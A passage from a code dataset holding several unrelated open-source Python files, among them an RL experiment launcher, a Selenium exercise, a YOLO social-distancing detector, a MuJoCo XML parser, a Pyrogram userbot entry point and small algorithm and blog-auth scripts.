pilot_policy=eval_pilot_policy)\n cross_evals[(training_pilot_id, eval_pilot_id)] = list(zip(*[run_ep_copilot(copilot_policy, co_env_eval, pilot=eval_pilot_policy, pilot_tol=eval_pilot_tol, render=False, max_ep_len=max_ep_len)[:2] for _ in\n range(n_eval_eps)]))\n\n f = open(base_dir + \"/cross_eval.txt\", \"w\")\n\n for key, value in cross_evals.items():\n mean_rewards = np.mean(value[0])\n outcome_distrns = Counter(value[1])\n\n f.write('\\n Training pilot: {}, eval pilot: {}'.format(key[0], key[1]))\n f.write(' Mean reward: ' + str(mean_rewards))\n f.write(' Outcome distribution: '+ str(outcome_distrns))\n\n f.close()\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Empowerment Lander Testbed')\n\n parser.add_argument('--exp_title', type=str, default='', help='Title for experiment')\n parser.add_argument('--mode', type=str, default='local',\n help='Mode for running the experiments - local: runs on local machine, '\n 'ec2: runs on AWS ec2 cluster (requires a proper configuration file)')\n parser.add_argument('--empowerment', type=float, default=100.0,\n help='Empowerment coefficient')\n parser.add_argument('--seed', type=int, default=1, help='Seed')\n args = parser.parse_args()\n\n local_mount = mount.MountLocal(local_dir=config.BASE_DIR, pythonpath=True)\n docker_mount_point = os.path.join(config.DOCKER_MOUNT_DIR, EXP_NAME)\n\n sweeper = launcher.DoodadSweeper([local_mount], docker_img=config.DOCKER_IMAGE,\n docker_output_dir=docker_mount_point,\n local_output_dir=os.path.join(config.DATA_DIR, 'local', EXP_NAME))\n sweeper.mount_out_s3 = mount.MountS3(s3_path='', mount_point=docker_mount_point, output=True)\n\n if args.mode == 'ec2':\n if query_yes_no(\"Continue?\"):\n sweeper.run_sweep_ec2(run_experiment, {'empowerment':[0.001], 'exp_title': [''], 'seed':[1]}, bucket_name=config.S3_BUCKET_NAME,\n instance_type='c4.2xlarge',\n region='us-west-1', s3_log_name=EXP_NAME, add_date_to_logname=True)\n elif args.mode == 'local_docker':\n mode_docker = dd.mode.LocalDocker(\n image=sweeper.image,\n )\n run_sweep_doodad(run_experiment, {'empowerment':[100.0]}, run_mode=mode_docker,\n mounts=sweeper.mounts)\n else:\n run_experiment(empowerment=args.empowerment, exp_title=args.exp_title + '_' + 
str(args.seed))","repo_name":"yuqingd/ave","sub_path":"empowerment_lander/run_scripts/train_copilot.py","file_name":"train_copilot.py","file_ext":"py","file_size_in_byte":8904,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"30837076519","text":"# 在百度首页上通过CSS标签定位方式定位input标签,并且证明首个input标签是name属性值为ie 的标签\n# from selenium import webdriver\n# import time\n# driver = webdriver.Firefox()\n#\n# url = \"https://www.baidu.com/\"\n# driver.get(url)\n#\n# el_input = driver.find_element_by_css_selector(\"input\")\n# print(el_input.get_attribute(\"name\"))\n#\n# time.sleep(2)\n# driver.close()\n# 使用CSS定位方式依次访问sample_test,html中的元素,\n# # 1.div1使用id定位方式\n# # 2.div1中 p1中的a标签采用层级定位方式(多层级定位)\n# # 3.最后一个a标签应该采用何种定位方式?\n#\n# from selenium import webdriver\n# import time\n# driver = webdriver.Firefox()\n# url = \"file:///C:/Users/liuqun/Desktop/css_example.html\"\n# driver.get(url)\n#\n\n\nfrom selenium import webdriver\nimport time\ndriver = webdriver.Firefox()\nurl = \"file:///C:/Users/liuqun/Desktop/css_example.html\"\ndriver.get(url)\nel_input = driver.find_element_by_css_selector(\"#div1\")\nprint(el_input.get_attribute(\"id\"))\n# el_div1 = driver.find_element_by_css_selector(\"#div1 a\")\n# print(el_div1.get_attribute(\"name\"))\nel_input = driver.find_element_by_css_selector(\"div p a\")\nprint(el_input.get_attribute(\"text\"))\n\nel_input = driver.find_element_by_css_selector(\"#div2+a\")\nprint(el_input.get_attribute(\"text\"))\n\ntime.sleep(3)\ndriver.close()\n\n\n\n","repo_name":"liuqun5050/myScript","sub_path":"自动化/自动化第二天作业.py","file_name":"自动化第二天作业.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70742287128","text":"import json\nimport os \ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n__version__ = \"1.0.19\"\n\nf = open(f\"{dir_path}/config/rula.json\")\nrula_config = json.load(f)\nf.close()\n\nf = open(f\"{dir_path}/config/reba.json\")\nreba_config = json.load(f)\nf.close()\n\nf = open(f\"{dir_path}/config/niosh.json\")\nniosh_config = json.load(f)\nf.close()\n\nf = open(f\"{dir_path}/config/handstrain.json\")\nhandstrain_config = json.load(f)\nf.close()\n\nf = open(f\"{dir_path}/config/skeleton.json\")\nskeleton_config = json.load(f)\nf.close()\n","repo_name":"diwgan32/tumeke","sub_path":"pytumeke/src/pytumeke/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42094557050","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\nimport string \nfrom jproperties import Properties\n\nparser = argparse.ArgumentParser(description=\"Replace text with env variables\")\nparser.add_argument(\"envfile\",type=open)\nparser.add_argument(\"infile\",type=open)\nparser.add_argument(\"outfile\",type=open,nargs='?')\nargs = parser.parse_args()\n\n\ndef export(file_name,values,new_file_name=\"standart output\"):\n\n t=\"\"\n try:\n content=file_name.read()\n print(\"I've read content\")\n t = string.Template(content).substitute(values)\n if new_file_name == \"standart output\":\n print(t)\n else:\n with open(new_file_name.name,\"w+\") as f:\n f.write(t)\n print(\"I've exported lines\")\n except Exception:\n print(\"Unknown error\")\n\ndef parser():\n values = Properties()\n try:\n values.load(args.envfile)\n except Exception:\n print(\"Occurred exception\")\n if args.outfile:\n 
export(args.infile,values,args.outfile)\n    else:\n        export(file_name=args.infile,values=values)\n    print(\"Success!\")\n    \n\n\nif __name__==\"__main__\":\n    if len(sys.argv) >= 2:\n        parser()\n    else:\n        print(\"Call {} -h\".format(sys.argv[0]))\n\n","repo_name":"m-tiapko/taskspace","sub_path":"argsparser/argparser.py","file_name":"argparser.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38387551438","text":"\"\"\"Command-line interface to Kajiki to render a single template.\"\"\"\n\nimport argparse\nimport os\nimport site\nimport sys\n\nimport kajiki.loader\n\n\ndef _kv_pair(pair):\n    \"\"\"Convert a KEY=VALUE string to a 2-tuple of (KEY, VALUE).\n\n    This is intended for usage with the type= argument to argparse.\n    \"\"\"\n    key, sep, value = pair.partition(\"=\")\n    if not sep:\n        raise argparse.ArgumentTypeError(\n            \"Expected a KEY=VALUE pair, got {}\".format(pair)\n        )\n    return key, value\n\n\ndef main(argv=None):\n    parser = argparse.ArgumentParser(description=__doc__)\n    parser.add_argument(\n        \"-m\",\n        \"--mode\",\n        dest=\"force_mode\",\n        choices=[\"text\", \"xml\", \"html\", \"html5\"],\n        help=(\n            \"Force a specific templating mode instead of auto-detecting \"\n            \"based on extension.\"\n        ),\n    )\n    parser.add_argument(\n        \"-i\",\n        \"--path\",\n        action=\"append\",\n        dest=\"paths\",\n        default=[],\n        metavar=\"path\",\n        help=(\n            \"Add to the file loader's include paths. For the package \"\n            \"loader, this will add the path to Python's site directories.\"\n        ),\n    )\n    parser.add_argument(\n        \"-v\",\n        \"--var\",\n        action=\"append\",\n        dest=\"template_variables\",\n        default=[],\n        type=_kv_pair,\n        metavar=\"KEY=VALUE\",\n        help=\"Template variables, passed as KEY=VALUE pairs.\",\n    )\n    parser.add_argument(\n        \"-p\",\n        \"--package\",\n        dest=\"loader_type\",\n        action=\"store_const\",\n        const=kajiki.loader.PackageLoader,\n        default=kajiki.loader.FileLoader,\n        help=\"Load based on package name instead of file path.\",\n    )\n    parser.add_argument(\n        \"file_or_package\",\n        help=\"Filename or package to load.\",\n    )\n    parser.add_argument(\n        \"output_file\",\n        type=argparse.FileType(\"w\"),\n        default=sys.stdout,\n        nargs=\"?\",\n        help=\"Output file. If unspecified, use stdout.\",\n    )\n\n    opts = parser.parse_args(argv)\n\n    loader_kwargs = {}\n    if opts.loader_type is kajiki.loader.PackageLoader:\n        for path in opts.paths:\n            site.addsitedir(path)\n    else:\n        opts.paths.append(os.path.dirname(opts.file_or_package) or \".\")\n        loader_kwargs[\"path\"] = opts.paths\n\n    loader = opts.loader_type(force_mode=opts.force_mode, **loader_kwargs)\n    template = loader.import_(opts.file_or_package)\n    result = template(dict(opts.template_variables)).render()\n    opts.output_file.write(result)\n\n    # Close the output file to avoid a ResourceWarning during unit\n    # tests on Python 3.4+. 
But don't close stdout, just flush it\n    # instead.\n    if opts.output_file is sys.stdout:\n        opts.output_file.flush()\n    else:\n        opts.output_file.close()\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])  # pragma: no cover\n","repo_name":"jackrosenthal/kajiki","sub_path":"kajiki/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"31"} +{"seq_id":"1890096895","text":"# This is the custom module with pre-trained YOLO object detector\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\n\r\nclass Social():\r\n    # all initializations with loading of the coco model and weights\r\n    def __init__(self):\r\n        self.weights = \"./yolo-coco/yolov3.weights\"\r\n        self.config = \"./yolo-coco/yolo.cfg\"\r\n        self.labelsPath = \"./yolo-coco/coco.names\"\r\n\r\n    # checking the distance between pairs of centroids of rectangles\r\n    def Check_distance(self, a, b):\r\n        dist = ((a[0] - b[0]) ** 2 + 550 / ((a[1] + b[1]) / 2) * (a[1] - b[1]) ** 2) ** 0.5\r\n        calibration = (a[1] + b[1]) / 2\r\n        if 0 < dist < 0.25 * calibration:\r\n            return True\r\n        else:\r\n            return False\r\n    # setting up the labels and processing the file to get classes from coco-names\r\n    def Setup(self):\r\n        self.LABELS = open(self.labelsPath).read().strip().split(\"\\n\")\r\n        self.net = cv2.dnn.readNetFromDarknet(self.config, self.weights)\r\n        self.ln = self.net.getLayerNames()\r\n        self.ln = [self.ln[i[0] - 1] for i in self.net.getUnconnectedOutLayers()]\r\n\r\n    # Processing the exact frame for the calculation of the centroid after detecting the persons and locating them in the same frame\r\n    def ImageProcess(self, image):\r\n\r\n        (H, W) = (None, None)\r\n        frame = image.copy()\r\n        if W is None or H is None:\r\n            (H, W) = frame.shape[:2]\r\n        blob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416), swapRB=True, crop=False)\r\n        self.net.setInput(blob)\r\n        starttime = time.time()\r\n\r\n        # Forward pass through the YOLO network\r\n        layerOutputs = self.net.forward(self.ln)\r\n        stoptime = time.time()\r\n        print(\"Video is Getting Processed at {:.4f} seconds per frame\".format((stoptime - starttime)))\r\n        confidences = []\r\n        outline = []\r\n\r\n        for output in layerOutputs:\r\n            for detection in output:\r\n                scores = detection[5:]\r\n                maxi_class = np.argmax(scores)\r\n                confidence = scores[maxi_class]\r\n                if self.LABELS[maxi_class] == \"person\":\r\n                    if confidence > 0.5:\r\n                        box = detection[0:4] * np.array([W, H, W, H])\r\n                        (centerX, centerY, width, height) = box.astype(\"int\")\r\n                        x = int(centerX - (width / 2))\r\n                        y = int(centerY - (height / 2))\r\n                        outline.append([x, y, int(width), int(height)])\r\n                        confidences.append(float(confidence))\r\n\r\n        box_line = cv2.dnn.NMSBoxes(outline, confidences, 0.5, 0.3)\r\n\r\n        if len(box_line) > 0:\r\n            flat_box = box_line.flatten()\r\n            pairs = []\r\n            center = []\r\n            status = []\r\n            for i in flat_box:\r\n                (x, y) = (outline[i][0], outline[i][1])\r\n                (w, h) = (outline[i][2], outline[i][3])\r\n                center.append([int(x + w / 2), int(y + h / 2)])\r\n                status.append(False)\r\n\r\n            for i in range(len(center)):\r\n                for j in range(len(center)):\r\n                    close = self.Check_distance(center[i], center[j])\r\n\r\n                    if close:\r\n                        pairs.append([center[i], center[j]])\r\n                        status[i] = True\r\n                        status[j] = True\r\n            index = 0\r\n\r\n            for i in flat_box:\r\n                (x, y) = (outline[i][0], outline[i][1])\r\n                (w, h) = (outline[i][2], outline[i][3])\r\n                if status[index] == True:\r\n                    cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 150), 2)\r\n                
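# status[index] is True when this person is within the unsafe distance of\r\n                # another detection, so the box is drawn in red (BGR (0, 0, 150));\r\n                # everyone else gets a green box in the branch below.\r\n                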
elif status[index] == False:\r\n                    cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n                index += 1\r\n            # Drawing line between centroids if the boxes are close to each other\r\n            for h in pairs:\r\n                cv2.line(frame, tuple(h[0]), tuple(h[1]), (0, 0, 255), 2)\r\n        processedImg = frame.copy()\r\n        return processedImg # Returning the processed frame after drawing the boxes around the persons and indicating if the rules are violated\r\n","repo_name":"sachinlodhi/Social-Dest_Detection","sub_path":"yolo_module.py","file_name":"yolo_module.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30524194631","text":"class Node:\n    def __init__(self,initdata):\n        self.data=initdata\n        self.next=None\n\n    def getdata(self):\n        return self.data\n    def getnext(self):\n        return self.next\n\n    def setdata(self,newdata):\n        self.data=newdata\n    def setnext(self,newnext):\n        self.next=newnext\n\nclass UnorderedList:\n    def __init__(self):\n        self.head=None\n        self.length=0\n    def __str__(self):\n        out='['\n        current=self.head\n        while current!=None:\n            out=out+str(current.getdata())+','\n            current=current.getnext()\n        if out=='[':\n            return '[]'\n        else:\n            out=out[:-1]+']'\n        return out\n    def slice(self,start,end):\n        out = '['\n        current = self.head\n        for i in range(start):\n            current=current.getnext()\n        for i in range(end-start):\n            out = out + str(current.getdata()) + ','\n            current = current.getnext()\n        if out=='[':\n            return '[]'\n        else:\n            out=out[:-1]+']'\n        return out\n    def isempty(self):\n        return self.head==None\n    def add(self,newdata):\n        temp=Node(newdata)\n        temp.setnext(self.head)\n        self.head=temp\n        self.length+=1\n    def search(self,target):\n        found=False\n        current=self.head\n        while current!=None and found==False:\n            if current.getdata()==target:\n                found=True\n            current=current.getnext()\n        return found\n    def remove(self,target):\n        found = False\n        current = self.head\n        previous=None\n        while current != None and found == False:\n            if current.getdata() == target:\n                if previous!=None:\n                    previous.setnext(current.getnext())\n                else:\n                    self.head=current.getnext()\n                found = True\n            else:\n                previous=current\n                current = current.getnext()\n        if found:\n            self.length-=1\n        return found\n\n#test\nmylist=UnorderedList()\nmylist.add(31)\nmylist.add(11)\nmylist.add(21)\nmylist.add(4)\nmylist.add(54)\nmylist.remove(31)\nmylist.remove(11)\nmylist.search(31)","repo_name":"neil-n-zhang/data-structures-using-python","sub_path":"Chapter3/3-13_17list.py","file_name":"3-13_17list.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18501166919","text":"from json import load, dumps\nfrom string import ascii_letters, digits, punctuation\nfrom secrets import choice\n\ndef check_promo(promo_code, data):\n    '''\n    Check that the promo code does not already exist in the file\n    '''\n    for item in data:\n        if promo_code in dict(item)['promo']:\n            # collision: draw a fresh code and re-check it against every record\n            return check_promo(generate_promo(), data)\n    return promo_code\n\ndef get_json_promo(quantity, name, path = 'checker/data_promo.json'):\n    '''\n    Generate promo codes into the file\n    '''\n    list_promo = []\n    context = {}\n    data = False\n\n    # load existing codes, if any\n    try:\n        with open(path, 'r') as f:\n            data = load(f)\n    except Exception:\n        pass\n\n    for _ in range(quantity):\n        promo_code = generate_promo()\n\n        if data:\n            promo_code = check_promo(promo_code, data)\n\n        
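# check_promo only guards against codes already saved in the file; collisions\n        # inside this batch are still possible, just unlikely with secrets.choice\n        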
list_promo.append(promo_code)\n\n    # create the file or append the new codes\n    if list_promo:\n        try:\n            context[\"name\"] = name\n            context[\"promo\"] = list_promo\n            with open(path, 'r+') as f:\n                if data:\n                    text = ',' + dumps(context)\n                    f.seek(0, 2)\n                    f.seek(f.tell()-1, 0)\n                    f.write(text)\n                    f.seek(0, 2)\n                    f.write(']')\n\n        except FileNotFoundError:\n            with open(path, 'w') as f:\n                text = dumps([context])\n                f.write(text)\n\n# random character generator\ndef generate_promo():\n    alphabet = ascii_letters + digits + punctuation\n    return ''.join(choice(alphabet) for i in range(8))","repo_name":"VladislavPopovM/Generate_promo","sub_path":"checker/core_generate_promo.py","file_name":"core_generate_promo.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20152894338","text":"from collections import OrderedDict\nfrom decimal import getcontext\nfrom os.path import abspath, dirname, join, exists\nfrom mujoco_worldgen.transforms import closure_transform\n\nimport numpy as np\nimport xmltodict\nimport os\n\nfrom mujoco_worldgen.util.types import accepts, returns\nfrom mujoco_worldgen.util.path import worldgen_path\nfrom mujoco_worldgen.parser.normalize import normalize, stringify\n\ngetcontext().prec = 4\n\n'''\nThis directory should contain all XML string processing.\nNo other files should be manually converting types for XML processing.\nAPI:\n    parse_file() - takes in path to mujoco file and returns normalized dictionary\n    unparse_dict() - takes in an xml dictionary and returns an XML string\nNOTE FOR TRANSFORMS:\n    The internal xml_dict layout passed into transforms is the one returned by\n    normalize() -- see that docstring for more details on its layout.\nEvery other method should be considered internal!\n'''\n\n\n@accepts(str, bool)\n@returns(OrderedDict)\ndef parse_file(xml_path, enforce_validation=True):\n    '''\n    Reads xml from xml_path, consolidates all includes in xml, and returns\n    a normalized xml dictionary. See preprocess()\n    '''\n    # TODO: use XSD or DTD checking to verify XML structure\n    with open(xml_path) as f:\n        xml_string = f.read()\n\n    xml_doc_dict = xmltodict.parse(xml_string.strip())\n    assert 'mujoco' in xml_doc_dict, \"XML must contain <mujoco> node\"\n    xml_dict = xml_doc_dict['mujoco']\n    assert isinstance(xml_dict, OrderedDict), \\\n        \"Invalid <mujoco> node type {}\".format(type(xml_dict))\n    preprocess(xml_dict, xml_path, enforce_validation=enforce_validation)\n    return xml_dict\n\n\n@accepts(OrderedDict)\n@returns(str)\ndef unparse_dict(xml_dict):\n    '''\n    Convert a normalized XML dictionary into a XML string. See stringify().\n    Note: this modifies xml_dict in place to have strings instead of values.\n    '''\n    stringify(xml_dict)\n    xml_doc_dict = OrderedDict(mujoco=xml_dict)\n    return xmltodict.unparse(xml_doc_dict, pretty=True)\n\n\n@accepts(OrderedDict, str, bool)\ndef preprocess(xml_dict, root_xml_path, enforce_validation=True):\n    '''\n    All the steps to turn XML into Worldgen readable form:\n        - normalize: changes strings to floats / vectors / bools, and\n            consistently turns nodes into OrderedDict and List\n        - name_meshes: some meshes are missing names. 
Here we give default names.\n - rename_defaults: some defaults are global; we give them names so\n they are no longer global.\n - extract_includes: recursively, we extract includes and merge them.\n - validate: we apply a few final checks on the structure.\n '''\n normalize(xml_dict)\n set_absolute_paths(xml_dict, root_xml_path)\n extract_includes(xml_dict, root_xml_path, enforce_validation=enforce_validation)\n if enforce_validation:\n validate(xml_dict)\n\n\n@accepts(OrderedDict, str)\ndef set_absolute_paths(xml_dict, root_xml_path):\n dirnames = [\"@meshdir\", \"@texturedir\"]\n if \"compiler\" in xml_dict:\n for drname in dirnames:\n if drname in xml_dict[\"compiler\"]:\n asset_dir = worldgen_path('assets') + '/'\n path = xml_dict[\"compiler\"][drname]\n if path[0] != \"/\":\n relative_path = os.path.dirname(root_xml_path) + \"/\" + path\n xml_dict[\"compiler\"][drname] = os.path.abspath(relative_path)\n elif path.find(asset_dir) > -1:\n xml_dict[\"compiler\"][drname] = worldgen_path(\n 'assets', path.split(asset_dir)[-1])\n\n\n@accepts(OrderedDict, str, bool)\ndef extract_includes(xml_dict, root_xml_path, enforce_validation=True):\n '''\n Extracts \"include\" XMLs and substitutes their contents in place.\n '''\n def transform_include(node):\n if \"include\" in node:\n if isinstance(node[\"include\"], OrderedDict):\n node[\"include\"] = [node[\"include\"]]\n include_xmls = []\n for include_dict in node[\"include\"]:\n include_path = include_dict[\"@file\"]\n if not exists(include_path):\n include_path = join(dirname(abspath(root_xml_path)), include_path)\n assert exists(include_path), \"Cannot include file: %s\" % include_path\n with open(include_path) as f:\n include_string = f.read()\n include_xml = xmltodict.parse(include_string.strip())\n closure_transform(transform_include)(include_xml)\n assert \"mujocoinclude\" in include_xml, \"Missing <mujocoinclude>.\"\n include_xmls.append(include_xml[\"mujocoinclude\"])\n del node[\"include\"]\n for include_xml in include_xmls:\n preprocess(include_xml, root_xml_path, enforce_validation=enforce_validation)\n update_mujoco_dict(node, include_xml)\n closure_transform(transform_include)(xml_dict)\n\n\n@accepts(OrderedDict, OrderedDict)\n@returns(None.__class__)\ndef update_mujoco_dict(dict_a, dict_b):\n '''\n Update mujoco dict_a with the contents of another mujoco dict_b.\n '''\n other = (str, int, float, np.ndarray, tuple)\n for key, value in dict_b.items():\n if key not in dict_a:\n dict_a[key] = value\n elif isinstance(dict_a[key], list):\n assert isinstance(value, list), \"Expected %s to be a list\" % value\n dict_a[key] += value\n elif isinstance(value, other):\n assert(isinstance(dict_a[key], other))\n assert dict_a[key] == value, \"key=%s\\nTrying to merge dictionaries. \" \\\n \"They don't agree on value: %s vs %s\" % (key, dict_a[key], value)\n else:\n assert isinstance(dict_a[key], OrderedDict), \"dict_a = %s\\nkey=%s\\nExpected dict_a[key] to be an OrderedDict.\" % (dict_a, key)\n assert(isinstance(value, OrderedDict))\n update_mujoco_dict(dict_a[key], value)\n\n\n@accepts(OrderedDict)\ndef validate(xml_dict):\n '''\n If we make assumptions elsewhere in XML processing, then they should be\n enforced here.\n '''\n # Assumption: radians for angles, \"xyz\" euler angle sequence, etc.\n\n values = {'@coordinate': 'local',\n '@angle': 'radian',\n '@eulerseq': 'xyz'}\n for key, value in values.items():\n if key in xml_dict:\n assert value == xml_dict[key], 'Invalid value for \\\"%s\\\". 
We support only \\\"%s\\\"' % (key, value)\n\n # Assumption: all meshes have a name\n if \"asset\" in xml_dict and \"mesh\" in xml_dict[\"asset\"]:\n for mesh in xml_dict[\"asset\"][\"mesh\"]:\n assert \"@name\" in mesh, \"%s is missing name\" % mesh\n\n # Assumption: none of the default classes is global.\n if \"default\" in xml_dict:\n for key, value in xml_dict[\"default\"].items():\n assert key == \"default\", \"Don't use global variables in default %s %s\" % (key, value)\n\n # Assumption: all joints have a name.\n def assert_joint_names(node):\n if \"joint\" in node:\n for joint in node[\"joint\"]:\n assert \"@name\" in joint, \"Missing name for %s\" % joint\n\n if \"worldbody\" in xml_dict:\n closure_transform(assert_joint_names)(xml_dict[\"worldbody\"])\n","repo_name":"Replicable-MARL/MARLlib","sub_path":"marllib/patch/hns/mujoco-worldgen/mujoco_worldgen/parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","stars":627,"dataset":"github-code","pt":"31"} +{"seq_id":"40709204361","text":"#!/bin/python\n\n#Library Import Statements\nimport numpy as np\nimport sys\n\n#Name of Data File\nDat_File = str(sys.argv[1])\n\n#Read in Data File\ndata = np.genfromtxt(Dat_File)\n\n#Computation of Lift to Drag Ratio\nLDR = data[:,1]/data[:,2]\n\n#Location of Maximum Lift to Drag Ratio\nLDR_M_Loc = np.argmax(LDR)\n\n#Maximum Lift to Drag Ratio\nLDR_Max = LDR[LDR_M_Loc]\n\n#Angle of Attack at which Max L/D Occurs\nalpha_LDR_Max = data[LDR_M_Loc, 0]\n\nprint(\"#Alpha L/D Max (deg) | L/D max Value\")\nprint(alpha_LDR_Max, LDR_Max)\n","repo_name":"GingerGengar/Stability_Control","sub_path":"Programming/Comp_Trim_Angle.py","file_name":"Comp_Trim_Angle.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19539426218","text":"# -*- coding: utf-8 -*-\nimport os\nimport datetime\n\nid_debug = False\n\ndef log(msg):\n if id_debug:\n print(msg)\n\ndef mkdir(path):\n\n folder = os.path.exists(path)\n\n if not folder: # create the folder only if it does not already exist\n\n os.makedirs(path) # makedirs also creates any missing intermediate directories in the path\n\ndef mkcrashfile(path):\n\n current_path = os.path.abspath(path)\n\n father_path = os.path.abspath(os.path.dirname(current_path) + os.path.sep + \".\")\n\n crash_path = father_path + os.path.sep + 'log'\n\n mkdir(crash_path) \n\n # datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n\n # os.mknod(father_path)\n\n return crash_path\n\ndef mkzz1file(filename):\n\n# zz1 = os.path.exists(filename)\n\n# if zz1:\n\n# os.remove(filename)\n\n ZZ1file = open(filename,'a+')\n\n return ZZ1file\n\n\n\ndef write_format(file,name,edata):\n\n # write the value in scientific notation regardless of sign\n file.write(name + ' %.7e' % (edata))\n \ndef write_log_info(filename,logInfo):\n\n current_path = os.path.abspath(filename)\n\n father_path = os.path.abspath(os.path.dirname(current_path) + os.path.sep + \".\")\n\n info_path = father_path + os.path.sep + 'dataInfo'\n\n mkdir(info_path) \n\n filename = info_path + os.path.sep + os.path.basename(filename) + '_info.txt'\n\n info = open(filename,'w+')\n\n info.write(logInfo)\n\n info.close()\n\ndef write(filename,datas):\n\n ZZ1file = mkzz1file(filename)\n\n for key,values in datas.items():\n write_format(ZZ1file,key,values.es)\n ZZ1file.write('\\n')\n\n 
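# close the handle so buffered output is flushed to disk\n 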
ZZ1file.close()\n\n","repo_name":"caowen2211891/SouthernUSAFM","sub_path":"FileWriter.py","file_name":"FileWriter.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21948455807","text":"import logging\nimport os\nimport atexit\nimport sys\nimport asyncio\nimport subprocess\n\nimport pyrogram\nfrom pyrogram import types\nfrom pyrogram.methods.utilities.idle import idle\n\nfrom . import auth, database, loader, utils, extrapatchs\n\n\nasync def main():\n \"\"\"Main function\"\"\"\n\n me, app, tapp = await auth.Auth().authorize()\n\n await app.initialize()\n\n db = database.db\n\n modules = loader.ModulesManager(app, db, me)\n extrapatchs.MessageMagic(types.Message)\n\n if utils.is_tl_enabled():\n asyncio.ensure_future(tapp.start())\n app.tl = tapp\n else:\n app.tl = \"Not enabled\"\n\n await modules.load(app)\n\n if not db.get(\"shizu.me\", \"me\", None):\n id_ = (await app.get_me()).id\n db.set(\"shizu.me\", \"me\", id_)\n\n if pyrogram.__version__ != \"2.0.106.21\":\n logging.info(\"Installing shizu-pyrogram...\")\n\n subprocess.run(\n \"pip install https://github.com/AmoreForever/Shizu-Pyro/archive/dev.zip --force-reinstall\",\n shell=True,\n check=True,\n )\n\n logging.info(\"Successfully installed shizu-pyrogram!\")\n logging.info(\"Restarting...\")\n\n return atexit.register(os.execl(sys.executable, sys.executable, \"-m\", \"shizu\"))\n\n await idle()\n\n logging.info(\"Shizu is shutting down...\")\n return True\n","repo_name":"AmoreForever/Shizu","sub_path":"shizu/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"22849366481","text":"def solution(triangle):\n answer = 0\n m = [[0 for col in range(row + 1)] for row in range(len(triangle))]\n \n m[0] = triangle[0]\n \n for i in range(1, len(triangle)):\n for j in range(0, i + 1):\n for d in [0, -1]:\n nj = d + j\n if(0 <= nj <= i - 1):\n m[i][j] = max(m[i][j], triangle[i][j] + m[i - 1][nj])\n \n answer = (max(m[len(m) - 1]))\n \n return answer","repo_name":"jinukeu/Algorithm","sub_path":"프로그래머스/lv3/43105. 
정수 삼각형/정수 삼각형.py","file_name":"정수 삼각형.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41498888916","text":"from blog.models import users, posts\n\n\ndef login_required(fn):\n def wrapper(*args, **kwargs):\n if \"user\" in session:\n return fn(*args, **kwargs)\n else:\n print(\"you must log in\")\n\n return wrapper\n\n\ndef authenticate(**kwargs):\n username = kwargs.get(\"username\") # .get avoids a KeyError; it returns None when the key is missing\n email = kwargs.get(\"email\")\n user_data = [user for user in users if user['username'] == username and user['email'] == email]\n return user_data\n\n\ndef logged_user():\n username = session.get(\"user\")\n userid = [user[\"id\"] for user in users if user[\"username\"] == username][0] # match on \"username\", the same key authenticate() uses\n return userid\n\n\nsession = {}\n\n\nclass SigninView:\n def post(self, *args, **kwargs):\n user_name = kwargs.get(\"username\")\n email = kwargs.get(\"email\")\n user = authenticate(username=user_name, email=email)\n if user:\n print(\"success\")\n session[\"user\"] = user_name\n else:\n print(\"invalid credentials\")\n\n\n@login_required\ndef logout(*args, **kwargs):\n session.pop(\"user\")\n\n\nclass PostListView:\n @login_required\n def get(self, *args, **kwargs):\n return posts\n\n\nclass MyPostsView:\n @login_required\n def get(self, *args, **kwargs):\n userid = logged_user()\n qs = [p for p in posts if p.get(\"userId\") == userid][0]\n return qs\n\n\nclass PostCreateView:\n @login_required\n def post(self, *args, **kwargs):\n userId = logged_user()\n title = kwargs.get(\"title\")\n body = kwargs.get(\"body\")\n\n data = {\n \"userid\": userId,\n \"title\": title,\n \"body\": body\n }\n print(data)\n posts.append(data)\n print(\"post created successfully\")\n\n\nclass PostDetailsView:\n @login_required\n def get(self, *args, **kwargs):\n postId = kwargs.get(\"id\")\n qs = [p for p in posts if p.get(\"id\") == postId]\n return qs\n\n def put(self, id=None, *args, **kwargs):\n post = [p for p in posts if p.get(\"id\") == id][0]\n title = kwargs.get(\"title\")\n body = kwargs.get(\"body\")\n post[\"title\"] = title\n post[\"body\"] = body\n 